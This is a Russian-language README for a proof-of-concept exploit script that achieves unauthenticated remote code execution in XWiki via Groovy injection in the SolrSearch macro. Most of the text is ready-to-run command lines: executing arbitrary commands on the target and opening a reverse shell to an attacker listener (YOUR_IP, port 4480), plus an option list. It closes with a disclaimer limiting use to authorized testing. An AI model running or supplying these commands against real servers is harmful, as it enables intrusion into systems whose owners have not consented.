
Эксплойт XWiki без аутентификации для RCE через Reverse Shell
Эксплойт неаутентифицированного RCE в XWiki
Затронутые версии XWiki содержат уязвимость удаленного выполнения кода (RCE), вызванную небезопасной обработкой Groovy-выражений в макросе SolrSearch. Неаутентифицированные злоумышленники могут удаленно выполнить произвольный Groovy-код и получить обратный шелл (reverse shell).
Этот эксплойт можно использовать для выполнения кода на целевой машине, а также для установки обратного шелла. Доступны два режима: интерактивный или на основе параметров. Эксплойт может автоматически запустить слушатель или использовать существующий.

python3 xwiki_groovy_rce.py
# Remote Code Execution
python3 xwiki_groovy_rce.py --code "mkdir test" -u http://example.com
# Reverse Shell with automatic listener (default)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480
# Reverse Shell without existing listener (no automatic listener)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480 --no-listener
-h/--help: Показать справку
-u/--url: URL целевого XWiki (обязательно)
-r/--reverse-shell: Выполнить обратный шелл
-c/--command: Выполнить одну команду
-i/--ip: Указать IP слушателя (только для обратного шелла)
-p/--port: Указать порт слушателя (только для обратного шелла, по умолчанию=4444)
--no-listener: Не запускать слушатель (только для обратного шелла)
Это подтверждение концепции (proof-of-concept) предназначено только для образовательных и авторизованных целей тестирования.
Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным.
Авторы не несут ответственности за любое неправомерное использование этой информации.